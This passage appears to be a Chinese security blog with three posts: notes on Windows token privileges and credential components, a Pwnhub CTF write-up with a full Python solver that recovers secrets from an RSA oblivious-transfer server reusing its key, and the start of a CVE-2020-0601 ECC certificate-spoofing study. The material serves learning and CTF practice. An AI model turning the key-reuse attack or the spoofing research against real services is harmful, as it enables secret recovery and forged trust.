 35 0x000000023 SeCreateSymbolicLinkPrivilege     Attributes - 
 36 0x000000024 SeDelegateSessionUserImpersonatePrivilege  Attributes - 
Authentication ID:         (0,23098)
Impersonation Level:       Anonymous
TokenType:                 Primary
Source: User32             TokenFlags: 0x2000 ( Token in use )
Token ID: 181366           ParentToken ID: 0
Modified ID:               (0, de5e9)
RestrictedSidCount: 0      RestrictedSids: 0x0000000000000000
OriginatingLogonSession: 3e7
PackageSid: (null)
CapabilityCount: 0      Capabilities: 0x0000000000000000
LowboxNumberEntry: 0x0000000000000000
Security Attributes:
Unable to get the offset of nt!_AUTHZBASEP_SECURITY_ATTRIBUTE.ListLink
Process Token TrustLevelSid: (null)
注意特权那一栏:
特权的第23,29,30 bit正好都是1，对应在bit的形式就是（注意存在第0位）:
1
1100000100000000000000000000000
正好和我们之前和内存中存在的形式看的一致。于是我们就能够知道当前进程中的token拥有的特权有:
SeChangeNotifyPrivilege:这类用户能够绕过NTFS文件系统/注册表中的访问权限的check，也就是对文件有特殊的访问特权就是了。
SeImpersonatePrivilege:这类用户可以模拟已有的token，但是不能创建新的token，也就是模仿token的创建特权。
SeCreateGlobalPrivilege:这类用户可以创建全局的安全对象。（也就是那种跨session的global object的创建权限）
LUID local identifier
之前提到过，每一个安全对象都有一个唯一的SID，那么特权对象有没有对应的唯一标识符呢？其实是有的，就叫做LUID，本地唯一标识符（因为特权只对当前机器生效，所以不需要GUID）。LUID可以在每台机器之间都不同，甚至每次重启之后都不同。为了确认当前LUID和特权的对应关系，可以使用API
1
2
LookupPrivilegeValue
LookupPrivilegeName
进行切换。
一些杂项
Security system components
Windows下有很多实现了相关安全防护的组件（其中大部分都在%SystemRoot%\System32这个目录下)
Security reference monitor(SRM)
存在ntoskrnl.exe这个文件中，定义了acces token的数据结构，并且会对security access进行checks，以及对不同token分发权限，并且产生安全审计日志。
Local Security Authority Subsystem Service(Lsass)
常见的user-mode进程，主要用于本地操作系统安全策略管理（登陆用户管理，密码策略，用户（组）权限管理等等），用户权限，并且负责发送安全事件的日志。其中主要功能由Local Security Authority service(Lsasrv.dll)进行实现。
LSAIso.exe
Lsass使用，或者叫做Credential Guard，用于存放用户token的hash值，而不是直接在Lsas的内存中存放。由于Lsaiso.exe是Trustlet进程（与普通用户空间隔离），所以当需要与Lsass.exe通信的时候，只能使用ALPC
Lsass policy database
数据库中存储了了本地系统安全策略的设置。这个模块被存储在又ACL保护下的HKLM\SECURITY下的注册表中。其中包含的信息有：
哪个域被授权登入
哪个用户对系统有哪些操控权限
用户被分发的权限
启用的安全审计等级
其中还存储了一些和登陆信息有关的秘密。
Security Accounts manager(SAM)
这个服务用于管理定义在当前机器中用户名的组的数据库。这个模块由samsrv.dll实现，并且会被load到进程lsass.
SAM database
之前提到的被管理的数据库。里面存储了本地用户（组）以及对应密码和其他相关的属性。对于域控制者来说，SAM·中并不会存放域定义者的用户信息，但是会存放系统管理员恢复的账号和密码。这些数据存放在:HKLM\SAM
Active Directory（活动目录）
这是一个目录服务，包含一个存储域中对象的数据库。一个域由许多的计算机组成，这些计算机会被组织成一个安全组，并且作为一个实体进行管理。AD会将这些对象的信息存放在域中，包括用户，组以及计算机。域用户和组的密码信息以及权限都会被存储在一个在所有计算机中，被设计为域管理员的AD中。AD server 由Ntdsa.dll实现，同样运行在lsass.exe进程中。
Authentication packages
这个模块其实是指的哪些运行在lsass 以及其他实现了windows 客户验证的dlls。一个验证dll将会验证一个用户的用户名和密码是否匹配（或者当前机器会不会提供身份认证）。如果匹配，则返回给Lsass用户的安全身份，lsass用此来产生验证用的token。
Interactive logon manager(WinLogon)
这个就是Winlogon.exe，是第一个用户态的程序，用来进行SAS（Shared Access Signature），并且对登陆的会话进行管理。当用户登陆成功后，winlogon.exe将会创建第一个用户程序。
Login user inerface(LogonUI)
一个用户态的进程LogonUI.exe可以让用户对自己的身份进行验证。
Credential providers(CPs)
这个是一个COM对象，运行在进程LogonUI中，用来获取用户的用户名和密码，smartcard PIN 码，生物信息（指纹等等），或者其他的身份认证信息。完整的CPs由authui.dll，SmartcardCredentialProvider.dll，BioCredProv.dll以及FaceCredentialProvider.dll实现（有些特性win10才加入）
Network logon service(Netlogon)
这个是由Netlogon.dll（由svchost启动）模块实现的一个功能。用于设置对域控制的安全通道，以及安全请求。例如交互式登陆（如果域是在WIndows NT 4）或者LAN Manager以及NT LAN Manager(V1/V2)的身份认证，这个模块同样也会作为AD的登陆模块使用。
Kernel Security Device Driver(KsecDD)
一个内核态的模块(%SystemRoot%\System32\Drivers\Kescdd.sys)，实现了APLC(Advanced local procedure call的结构。让其他的内核态安全模块（包括Encryption File System(EFS)）能与Lsass进行通信
AppLocker
这个功能运行管理员能够指定哪个exe,dll，scripts能被指定的用户执行。这个模块由内核驱动（%SystemRoot%\System32\Drivers\Appld.sys）和服务(AppidSvc.dll)两部分组成
Credential Guard
Crediential Guard给系统中的不同元素提供了安全边界与保护。不过为了实现这个过程，首先需要知道程序是怎么实现身份验证的
Password:登陆验证，这个是最常见的身份验证方法。
NT one-way function(NT OWF):通常在用户用password登陆成功后，使用NT LAN用于对传统模块的身份验证。不过在现在的网络系统验证已经不使用这部分内容了
Ticket-granting ticket(TGT):这就是现代的远程网络验证常用的一个验证方式:Kerberos.这也是通常Windows AD域下常做的验证方式。在登陆成功之后，TGT以及相应的密钥将会被提供给本地机器。


pwnhub-crypto-theme
2020-02-22T14:19:50.000Z
好久没看到Pwnhub出题，于是趁着自己也研究了一下密码学相关的东西，看看能不能做出来一题。然而出题人实在是强，让人再一次明白了思路开阔的重要性
Pwnhub Crypto 解题记录
比赛中我总共看了两个题目，这里先记录以下我在解babyOT的时候的思路
题目描述
题目给出了一个python文件
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
#!/usr/bin/env -S python3 -u

import os
import string
from Crypto.PublicKey import RSA
from Crypto.Util.number import bytes_to_long
from random import SystemRandom


def getkey():
    if os.path.isfile("key.pem"):
        with open("key.pem", "rb") as f:
            key = RSA.importKey(f.read())
    else:
        key = RSA.generate(2048)
        with open("key.pem", "wb") as f:
            f.write(key.exportKey("PEM"))
    return key


def random_str(n):
    return "".join([random.choice(string.ascii_letters) for _ in range(n)])


if __name__ == "__main__":
    random = SystemRandom()

    key = getkey()

    print(key.n)
    print(key.e)

    while True:
        msg0 = bytes_to_long(random_str(2048 // 8 - 1).encode())
        msg1 = bytes_to_long(random_str(2048 // 8 - 1).encode())

        x0 = random.randrange(key.n)
        x1 = random.randrange(key.n)

        print(x0)
        print(x1)

        v = int(input())
        print((msg0 + pow(v - x0, key.d, key.n)) % key.n)
        print((msg1 + pow(v - x1, key.d, key.n)) % key.n)

        guess0 = int(input())
        guess1 = int(input())
        if guess0 == msg0:
            print("You are on the half way of success, work harder!")
            if guess1 == msg1:
                print(open('flag').read())
                exit()

题目本身跑在server上，我们需要直接与其进行通信。不过乍一看，好像就是猜随机数msg0/msg1，还得一次性猜对。其次注意到，我们可以交互的地方是这个v值，以及最后的猜测msg0/msg1的值。题目中还使用了RSA算法，不过这里的RSA是用PyCrypto这个库来生成的，所以目测应该没有什么太大的漏洞。一眼看过去能够注意到的点就只有这些了。
从题目上看，可能和这个叫做OT的东西相关，队友了解到是一个叫做Oblivious Transfer（不经意传输）的协议。于是这里首先要了解一下这个协议本身:
Oblivious Transfer 不经意传输
OT是多方安全计算下使用的算法之一。
协议解决的场景
要介绍一个协议，首先要介绍一下这个算法使用的场景：
假设有两个人Alice/Bob，Alice手上有很多的数据，Bob想要知道Alice的数据。但是两个人都非常小心，不想让对方知道自己的信息，具体来说就是：
Alice不想让Bob知道他不该知道的信息
Bob不想让Alice知道他选择了哪个信息
也就是说Bob想知道一个Alice信息，但是Alice不知道Bob选择了哪个信息，Bob也不能知道Alice的其他信息。（有一点零知识证明的意思）
算法细节
这边用最简单的【1-2 不经意传输】做例子。1-2的意思是【从两个消息中，选取一个信息】
这里摘录一个wiki的表格:
Alice 有两个秘密消息m0, m1
Alice 使用RSA算法，生成公钥(e, N)对公开，私钥d自己留着。公钥(e, N)告知 Bob。这里需要注意的是，每次通信的时候RSA都要重新生成一对公钥私钥
Alice 产生两个随机数x0, x1，并且将这两个随机数传输给 Bob。
Bob 【决定】要获取的数字编号b（0或者1），以及产生一个随机数
Bob 计算一个数字 $v=(x_b+k^e) mod N$  这里的e即为前面给出来的RSA的公钥。并且将这个v发送给 Alice
Alice 计算多个 $k_i$ ，其中一个 $k_i$ 将会等于k
 $k_0=(v-x_0)^d mod N \\k_1=(v-x_1)^d mod N$ 注意由于此时v并不是 Alice 产生的，所以此时的 Alice 并不知道哪一个k是 Bob 需要的
7. Alice 将生成的值与自己手上的信息进行相加，得到全新的信息
 $m_0'=m_0+k_0\\m_1'=m_1+k_1$ 并且将信息发送给Bob。因为此时每一个信息都增加了 $k_i$ ，所以 Bob 无法直接还原信息m
8. Bob 此时知道自己选择的信息编号b，于是选出 $m_b$ ，计算出 $k_b$ ，并且用 $m_b=m_b'-k_b$ 得到此时的解密信息。
如何解决场景
对于Alice而言：
Alice 能够知道的只是 Bob给出来的一个随机数 $x_b$ 算出来的值v，这个值还被一个用RSA公钥加密的k相加过，所以Alice无法知道这个 $x_b$ 具体是哪个值
对于Bob而言：
Alice 交出了所有的信息，但是Alice交出的信息中，除了自己指定的信息，另一个信息（假设是 $x_{b'}$ ）被加密成了 $m_{b'}'=m_{b'}+(x_b+k^e-x_{b'})^d$ 。这个信息 Bob 已经无法还原了，所以Bob只能获得自己想要的信息，其他信息只能抛弃
不过换个角度来说，Bob交给了Alice一个有可能判别身份的数字，Alice交给了Bob自己所有的信息。从结果上来看，两个地方都存在攻击面。实际上OT在实现上可以使用不同的公钥加密方式，不一定非要使用RSA。
题目分析
把协议过了一遍，发现这个题目本质上就是Server就是Alice， 我们来模拟Bob，解开被Alice加密的那些信息。不过乍一看，生成RSA密钥对用的是PyCrypto，那这个生成算法估计是没啥问题的。而且题目代码非常简洁，感觉不到什么可以被利用的地方。于是只好和队友重新过了一遍题目，发现几个问题点:
我们给出来的v可以和协议不一样，直接给出 $x_0$ ，这样我们可以直接得到msg0，不过这个时候msg1的为 $msg1 + (x_0- x_1)^d mod n$ 。
RSA的密钥对仅仅在代码最开头生成了一次。
msg0/msg1是ascii码，意味着都是可见的字符。进一步来说，如果能够进行一定的限制的话，msg0/msg1存在爆破的可能。
故事一开始，我猜测是不是有 $x_0-x_1$ 这个值能够在n上构成循环群，然后这个 $x_0-x_1$ 能够形成一个循环群之类的。虽然我们知道这个 $(x_0-x_1)^e$ 的阶为d，不过我当时猜测是不是有比较小的阶也能满足这个条件，最后显然是失败了，爆破了很久都爆不出来。虽然后来出题放放出了hint提到我们都忽略了一个点
RSA算法的密钥对没有重新生成
但是我们不知道怎么来考虑这点，毕竟v的值除了受到密钥对的影响，还有随机数x。
寻找不变量
最后官方WP放出来之后，我们才理解这个题目怎么做。记得很久以前看过解决小学奥数题有一个根本思路：要在变量里面寻找不变量。在这个题目里面的不变量其实就是RSA的密钥对(n, e, d)， 其中n，e我们又是已知的，d我们无法得知。不过认真看代码的话会发现有一个地方用到了这个值：
1
2
print((msg0 + pow(v - x0, key.d, key.n)) % key.n)
print((msg1 + pow(v - x1, key.d, key.n)) % key.n)
这里的 $F(v,x_i)=(v-x_i)^d modn$ 这个加密函数 $F$ 其实算是不变量，因为这里的d/n都是一个固定值。不过当时比赛的时候没想到这点怎么利用，后来看了答案得到了提示，那就是说
如果输入的值不变，那么就能获得一样的输出值
回想hintRSA算法的密钥对没有重新生成，这里其实暗示了一个点，那就是如果发起多次连接，RSA还是不变的。这里一个非常巧妙的地方就在于多次连接。我们知道，每次重新连接的时候，所有的信息都会被重置，不过在这里面，蕴藏着一个不变量，也就是我们之前提到的F加密函数，如果我们能够控制F函数的输入不变，那么我们就能够获得同一个输出！具体要怎么做呢？我们假设整个题目在第一次产生的变量叫做 $(x_0,x_1,msg_0,msg_1)$ ，第二次生成的变量叫做 $(x_0',x_1',msg_0',msg_1')$ ，我们第一次连接的时候，能够知道 $(x_0,x_1)$ ，输入的v为 $x_0$ ，然后就能得到 $msg_0$ 与 $msg_1+(x_0-x_1)^dmodn$ 。
这里可以看到，我们的v取值为 $x_0$ ，于是 $F(x_0,x_1)=(x_0-x_1)^dmodn$ 。
这之后，我们不关闭这个连接，重新建立新的连接，此时能够得到 $(x_0'-x_1')$ ，与此同时，我们知道在这一次，加密函数的写法变成了 $F(v, x_i')=(v-x_i')^dmodn$ 。第一次连接中我们需要推断的是 $(x_0-x_1)^dmodn$ ，于是这里的 $x_i->x_1$ 。于是可以有如下推断
 $\because F(v,x_1')=(v-x_1')^dmodn \\\therefore (x_0-x_1)^dmodn = (x_0-x_1+x_1'-x_1')^dmodn = F(x_0-x_1+x_1', x_1')$ 因此，当我们的 $v=x_0-x_1+x_1'$ 时，被 $F(v, x_1')$ 加密过的值将会与 $F(x_0, x_1)$ 相同，从而保证能够在多次连接中获得相同的加密值。至此，我们就在多个连接中找到了不变量。
题解推导
控制F获得同一个输出的意义在哪儿呢？首先，每一次都需要取猜测msg，乍一看每一次的数据都是独立的，不变量对于我们需要获取msg1有什么帮助呢？首先第一步，我们先确定我们要得到什么
需要知道msg的值
然后我们能够做什么
控制输入v
一个直观想法是，让v等于 $x_0$ ，但是此时官方会打印两个值:
 $msg0+0 \\msg1+(x_0-x_1)^d mod N$ 由于我们不知道d，所以无法算出 $(x_0-x_1)^d modN$ 。到这里，有几种不同的思路：
尝试获取d
直接爆破msg1
这里考虑到我们已知的条件:
多次连接下，可以获得相同的 $F(v, x_i)$ 
msg的每一个字节取值均为ascii
显然这个条件对于获取d没有什么帮助，乍一看好像也和直接爆破msg1没关系。我们这里设 $y = F(x_i,v)$ ，并设官方会打印数字P = (msg1 + pow(v - x1, key.d, key.n)) % key.n。如果我们进行了很多次的连接，同时将y控制不变，那么此时就有:
 $P=msg1+y \\P'=msg1'+y \\P''=msg1''+y \\... \\\text{其中，msg1的每一个字节均为ascii}$ 也就是说，每一次获得的msg都是一个区间值，因此就形成了一个不等式方程组。通过多次计算，y将会被逐渐限制在一个区间内，最后得到一个具体的值。这样我们就能够爆破得到y，从而猜测到msg的基本信息。带入不等式可以有
 $P=msg1+y \Rightarrow msg1=P-y \\\because\begin{matrix} \underbrace{ 0x414141+\cdots } \\ 384 \end{matrix} \leq msg1 \leq \begin{matrix} \underbrace{ 0x7a7a7a+\cdots } \\ 384 \end{matrix} \\\therefore \begin{matrix} \underbrace{ 0x414141+\cdots } \\ 384 \end{matrix} \leq P-y \leq \begin{matrix} \underbrace{ 0x7a7a7a+\cdots } \\ 384 \end{matrix} \\\therefore P - \begin{matrix} \underbrace{ 0x7a7a7a+\cdots } \\ 384 \end{matrix} \leq y \leq P - \begin{matrix} \underbrace{ 0x414141+\cdots } \\ 384 \end{matrix}$ 不过说起来，仔细考虑的话会发现，由于这里考虑的粒度比较粗，所以有一些情况会无法涵盖（例如msg的取值不可能为0x412041.....）所以此时得到的范围会相对来说比较宽泛，我们需要缩小取值范围
缩小取值范围
我们首先要注意msg1并不是真正意义上的从[0x41414141....~0x7a7a7a7a7a...]，之前的例子理也出现过了，例如0x41204141.....这种数字是不会出现的，所以我们与其整体考虑，不如拆分成每一个数字来考虑。也就是我们将考虑每一个数字可能的取值范围。
 $\text{这里假设} msg1=m_0m_1m_2...m_{384}, y=y_0y_1...y_{384} P=P_0P_1...P_{384} \\\text{则此时有} m_i \in \{ord('A')...ord('Z'), ord('a')...ord('z')\} \\\text{那么此时}y = P-msg1 \Rightarrow y_i \in \{P_i-ord('A')...P_i-ord('Z'), P_i-ord('a')-P_i-ord('z')\}$ 那么我们取多次P，就能够将y缩小到一个比较小的范围里面。不过这里取值的时候，需要考虑到借位的问题:
 $\text{假设第i-1个值}: P_{i-1} \leq ord('A') \\\text{则此时第i个数字必然发生借位，于是有} \\ P_i-ord('z')-1 \leq y_i \leq P_i-ord('A')-1 \\\text{假设第i-1个值}: P_{i-1} \leq ord('z')，\text{此时下下标为i-1}\\\text{则此时第i个数字的取值中的左边可能发生借位}，\text{也就是}\\P_i-ord('z')-1 \leq y_i \leq P_i-ord('A')$ 为了增大检测范围，此时可以用如下两条规则来确定:
当 $P_{i-1} \leq ord('A')$ ，则必定左，右侧同时借位
当 $P_{i-1} \leq ord('z')$ ，则必定左侧借位
其余情况一律当作不接位处理（毕竟是不停产生的随机数，所以可以稍微放松一点约束条件）
细节处理
除此之外，有一个小细节，是写poc才发现的。。。看代码这段:
1
2
msg0 = bytes_to_long(random_str(2048 // 8 - 1).encode())
msg1 = bytes_to_long(random_str(2048 // 8 - 1).encode())
实际上msg的长度没有真实随机数的长度长，所以实际上我们需要爆破的只有255个字节，第256个字节只需要考虑进位问题即可
最终爆破
当我们把范围限制在一个可以承受的范围的时候（可能的取值控制在500000左右之后），我们就可以尝试去爆破y的具体取值（毕竟原题目是一个需要交互的题目，减少交互可以减小网络等问题的影响）。具体怎么做呢？由于此时我们已知 $y=msg1+(x_0-x_1)^dmodN$  ，此时我们可以确认的已知量为  $x_0-x_1$  ，所以我们的算式需要围绕这个值来进行爆破。由于我们使用了RSA对这个数字进行加密，所以我们可以遍历区间中的所有取值，检查  $(y-msg1)^emodN == x_0-x_1$ 。如果成立的话，则代表我们爆破的y是合理的。
这里贴上为了解题写的poc，并且改写成了本地的版本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
import os
import string
from Crypto.PublicKey import RSA
from Crypto.Util.number import bytes_to_long, long_to_bytes
from random import SystemRandom
from itertools import product
import gmpy2
import codecs


class NumSet(object):

    def __init__(self, init_set, index):
        self.final_set = init_set
        self.possible = set()
        self.index = index

    def add_possible(self, num):
        # if num < 0:
        #     num += 256
        self.possible.add(num % 256)

    def check_possible(self):
        """
        becuase not all number is possible, here we 
        should and the final_set with possible set
        And finally, we will clear the possible set
        """
        self.final_set &= self.possible
        self.possible = set()
        condition = len(self.final_set) > 0
        if not condition:
            print("index is " + str(self.index))
        # assert(condition)
        return len(self.final_set) > 0

    def and_possible(self, s):
        if type(s) == type(set()):
            self.possible &= s
        else:
            print("Please check input type")

    def get_length(self):
        return len(self.final_set)

    def in_set(self, n):
        return n in self.final_set

    def __str__(self):
        return "the set is {}".format(self.final_set)


class Server(object):
    def __init__(self):
        self.key = None
        self.x0 = self.x1 = 0
        self.msg0 = self.msg1 = 0

    def init_server(self):
        self.random = SystemRandom()
        if os.path.isfile("key.pem"):
            with open("key.pem", "rb") as f:
                key = RSA.importKey(f.read())
        else:
            key = RSA.generate(2048)
            with open("key.pem", "wb") as f:
                f.write(key.exportKey("PEM"))
        self.key = key

    def get_key(self):
        return self.key

    def generate_x0_x1(self):
        x0 = self.random.randrange(self.key.n)
        x1 = self.random.randrange(self.key.n)
        self.x0, self.x1 = x0, x1
        return x0, x1

    def random_str(self, n):
        return "".join([self.random.choice(string.ascii_letters) for _ in range(n)])

    def generate_value(self, v):
        msg0 = bytes_to_long(self.random_str(2048 // 8 - 1).encode())
        msg1 = bytes_to_long(self.random_str(2048 // 8 - 1).encode())
        value0 = (msg0 + pow(v - self.x0, self.key.d, self.key.n)) % self.key.n
        value1 = (msg1 + pow(v - self.x1, self.key.d, self.key.n)) % self.key.n
        self.msg0 = msg0 
        self.msg1 = msg1
        return value0, value1

    def check_answer(self, msg0, msg1):
        if msg0 == self.msg0 and msg1 == self.msg1:
            print("You find the answer!")
        else:
            print("Sorry the answer is wrong~")
            

possible_num = []
for i in range(256):
    possible_num.append(NumSet({t for t in range(256)}, i))
# possible_num = [NumSet({i for i in range(256)}, i) for i in range(256)]

def check_scale(num):
    global possible_num
    # @param num:bytes number that used to limit value
    left_carry = 0
    right_carry = 0
    for i in range(255, -1, -1):
        each_num = num[i]
        if i == 0:
            possible_num[i].add_possible(each_num - left_carry)
            possible_num[i].add_possible(each_num)
            possible_num[i].check_possible()
        else:
            for c in range(ord('A'), ord('z')+1):
                tmp = c
                result = each_num - tmp
                if left_carry == 1:
                    result -= 1
                possible_num[i].add_possible(result)
            
            if right_carry == 0:
                possible_num[i].add_possible(each_num - ord('A'))
            if not possible_num[i].check_possible() :
                print(each_num)
                print(possible_num[i].final_set)
                assert(False)
            if each_num < ord('A'):
                left_carry = right_carry = 1
            elif each_num < ord('z'):
                left_carry = 1
                right_carry = 0
            else:
                left_carry = right_carry = 0


def generate_number():
    tmp_ans = []
    tmp_num = []
    for each in possible_num:
        tmp_num.append(each.final_set)

    for each in product(*tmp_num):
        tmp_number = bytes_to_long(bytes(each))
        tmp_ans.append(tmp_number)

    return tmp_ans
    
def guess_num(value_1, key, we_need_know, x0x1):
    global test_left_scale
    bytes_value = long_to_bytes(value_1, 256)
    check_scale(bytes_value)
    all_possibles_number = 1
    all_possibles_array = []
    for i, each in enumerate(possible_num):
        all_possibles_array.append(each.get_length())
        all_possibles_number *= each.get_length()
    print("{}:{}".format(all_possibles_number, all_possibles_array))
    if all_possibles_number < 500000:
        print("Ok, we can get length")
        index = 0
        ans_array = generate_number()
        for m in ans_array:
            m %= key.n
            # if m == we_need_know:
            if pow(m, key.e, key.n) == x0x1:
                return m

        print("Failed")
        assert(False)
    return -1

if __name__ == "__main__":
    # global test_scale
    # random = SystemRandom()
    first_server = Server()
    first_server.init_server()
    x0, x1 = first_server.generate_x0_x1()
    v = x0
    msg0, value1 = first_server.generate_value(v)
    key = first_server.get_key()
    we_need_know = pow(v - x1, key.d, key.n)
    guess0 = v
    msg1 = 0

    while True:
        # here work as server
        new_server = Server()
        new_server.init_server()
        x_0, x_1 = new_server.generate_x0_x1()
        v = x0-x1+x_0
        value_0, value_1 = new_server.generate_value(v)
        num = guess_num(value_0, key, we_need_know, (x0-x1)%key.n)
        if num == we_need_know:
            msg1 =  (value1 - num) % key.n
            print("successful!")
            break
        num = -1
        if num != -1:
            break

    first_server.check_answer(msg0, msg1)

后记
整个题目前前后后花了大概有半个月的时间来解，除了平时上班之外，其实剩余的时间也是不少，不过最近因为各种原因，心思总是不能集中在一件事情上，导致实际上公式老早就推导完成，但是实际上poc却写了有两周这样无厘头的事情。
关于密码学
边界条件真的很重要。尤其这种带有猜测性质的问题，poc很多时候要么会猜测错误答案导致最后某个字节可能的取值为空，要么会少猜测一些值导致迟迟不能进行爆破，其实很大原因是因为边界值搞得不对。
跳出纯粹的数学思维。这可能更加是针对协议来说，协议里面有一条RSA需要在每次握手的时候进行变化，为什么要这么做呢？当初我以为是有什么没见过的数学原理在里面，现在想想协议规定这一条实际上应该就是为了预防这种单次链接未结束的时候，进行多次链接这种特殊情况。在考虑协议的时候，除了正向考虑问题（直接从头到尾寻找整个流程中可以被攻击的算法），有时候也可以逆转思路来考虑（不是顺序触发流程中的条件，而是检查协议本身是否存在可以泄露信息的地方）


CVE-2020-0601 Research
2020-01-21T07:43:08.000Z
一直企图复现CVE，这次来了个简单的，让我研究一哈

CVE-2020-0601 的相关了解
漏洞简介
Windows 的crypt32.dll模块中，对于使用了 椭圆曲线密码（ Elliptic Curve Cryptography ECC） 的证书的验证的过程出现纰漏，使得攻击者可以通过伪造证书，给一些恶意软件签名，伪装成正常的软件，或者强行安装驱动；亦或者伪造https证书，实现中间人攻击。
具体细节
Elliptic Curve Cryptography
要想了解这个漏洞，首先得了解一下这个ECC。这里选取课本上对ECC的定义。
首先我们需要定义以下什么叫做椭圆曲线。设F表示一个域，则在这个域上的如下形式的表达式
 $y^2+a_1xy+a_3y = x^3+a_2x^2+a_4x+a_6$ 确定的点  $(x,y) \in FxF$  以及一个特殊的无穷远点O所构成的集合，被称为椭圆曲线，其中的 $a_1, a_2, a_3, a_4, a_6$ ∈F。 上述式子同时被称为Weierstrass方程
然后我们加密算法中讨论的椭圆曲线在满足F的特征既不等于2又不等于3（就是说 mod 的数字既不是2也不是3）的时候，上述椭圆曲线的方程可以化简为
 $y^2=x^3+ax+b$ 其中 $x, y \in F$ 
满足加密算法要求的椭圆曲线
在实数域上的一元三次方程  $x^3+ax+b=0$   我们定义一个判别式Δ如下:
 $Δ = 4a^3+27b^3$ 当$$Δ=0$$的时候，函数图像会变成如下的形式
这种曲线被称为奇异椭圆曲线。这类曲线不被用于椭圆曲线方程
个人推测是因为在域F中任意取两点做出来的直线，与这个曲线的交点可能仅有两个，而椭圆曲线加密需要能够得到三个点，具体做方法见下文
当$$Δ!=0$$的时候，得到的曲线被称为非奇异椭圆曲线

如上为常见的非奇异椭圆曲线的样子。
这里设一个点$$O$$为无穷远点，于是我们能够得到实数域上的椭圆曲线点的加法运算
 $E=\{(x,y)|y^2=x^3+ax+b,4a^3+27b^2!=0\}\cup\{O\}$ 然后我们定义一个椭圆曲线上的加法运算 $\oplus$ ，规则入下：
对于任意 $P=(x_1, y_1) \inE, Q=(x_2, y_2)∈E$ ，定义:
 $P+Q=\begin{cases}\Omicron & , & \text{如果}x_1=x_2, y_1=y_2=0; \\\Omicron & , & \text{如果}x_1=x_2, y_1=-y_2\not=0; \\(x_3,y_3) & , & \text{否则}\end{cases}$ 其中
 $x_3=\lambda^2-x_1-x_2,\\y_3=\lambda(x_1-x_3)-y_1,\\\lambda=\begin{cases}\frac {y_2-y_1}{x_2-x_1} &,& \text{如果}P\not=Q \\\frac {3x_1^2+a}{2y_1} &,& \text{如果}P=Q\end{cases}$ 此外，对于任意 $P=(x_1,y_1)\in E$ ，定义
 $P+\Omicron=\Omicron+P=P$ 从图形上看是这样的
从定义上来谈就是：
从椭圆曲线E上任意取P，Q两点，将这两点连接形成直线l。其中如果P=Q，则此时直线与椭圆曲线相切。直线l必定与图欧元曲线相交于另外一个点R，过R做y轴的平行线l’，这里l’定义为R与无穷远点 $\Omicron$ 的交点。l’与椭圆曲线相较于的点R’，我们就是视为P+Q的结果。从定义上可以看出，公式实际上可以写作
 $P+Q+R=0$ 于是这里我们就把之前定义的 $\oplus$ (简写为+)写作:
 $P+Q=-R$ 上述推导的式子，在满足p>3的有限域 $Z_p$ 上成立。（可以粗略的理解定义域和值域均为[0, p]的情况下依然成立）
CA相关
这个算法实际上利用的是CA的验证漏洞，所以这里我们先介绍一下和CA相关的内容:
CA工作流程
一个CA是怎么进行工作的呢？
每一个浏览器/计算机中都会预装一些CA证书。证书中将会包含当前CA的公钥，用于验证。
但我们想要创建一个属于自己的数字证书的时候，首先我们需要创建创建一个公钥/私钥对（这个用OpenSSL就能做到）这种就叫做证书签名请求CSR.CSR中包含如下内容
一份公钥的拷贝
一些对象的基本信息
一旦创建好了CSR，就能够将这个请求提交给CA。一旦CA将这个证书签名完成后，这个证书将会返回一个签过名的cert证书，之后我们就能够将这个证书导入到我们的服务器中。
一个签名证书中包含如下内容：
包括网站的基本信息
有效时间
当前网站使用的公钥内容
证书使用CA私钥签名后得到的数字签名
OpenSSL 签名文件的基本流程
为了能够更好的知道这个漏洞利用的技巧，首先我们需要知道文件签名的基本逻辑：
每次椭圆加密的时候，都需要提供这个加密算法需要的参数（例如生成元，椭圆曲线等）。这种时候可以提前生成需要的参数:
1
openssl ecparam -name secp384r1 -out secp384r1.pem
这样就能够生成算法secp384r1需要用到的基本参数。这里进行查看:
1
2
3
4
5
$ cat secp384r1.pem

-----BEGIN EC PARAMETERS-----
BgUrgQQAIg==
-----END EC PARAMETERS-----
可以发现，这边的内容非常短，使用openssl检查的话可以看到如下的结果:
1
2
3
4
5
6
7
$ openssl ecparam -in secp384r1.pem -text

ASN1 OID: secp384r1
NIST CURVE: P-384
-----BEGIN EC PARAMETERS-----
BgUrgQQAIg==
-----END EC PARAMETERS-----
可以看到这边只有一些普通的基本信息。因为大部分的机器上面都有这种算法的基本参数（比如说生成元，阶等）。我们可以使用参数文件来创建指定的椭圆曲线加密公钥私钥对。方法如下:
1
openssl ecparam -in secp384r1.pem -genkey -noout -out secp384r1-key.pem
或者直接使用机器上默认已有的加密参数进行加密:
1
openssl ecparam -name secp384r1 -genkey -noout -out secp384r1-key.pem
这个时候用来生成密钥的基本参数会直接嵌套在当前文件中。
但是有些比较老的机器上，可能没有这些需要的参数。为了解决这种问题，可以使用关键字**-param_enc explicit**来指定。这种时候生成的参数文件能够将所有需要的参数包含在文件里面
1
openssl ecparam -name secp384r1 -out secp384r1.pem -param_enc explicit
这个时候再查看生成的EC参数文件内容如下：
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
$ openssl ecparam -in secp384r1.pem  -text

Field Type: prime-field
Prime:
    00:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:ff:
    ff:ff:fe:ff:ff:ff:ff:00:00:00:00:00:00:00:00:
    ff:ff:ff:ff
A:
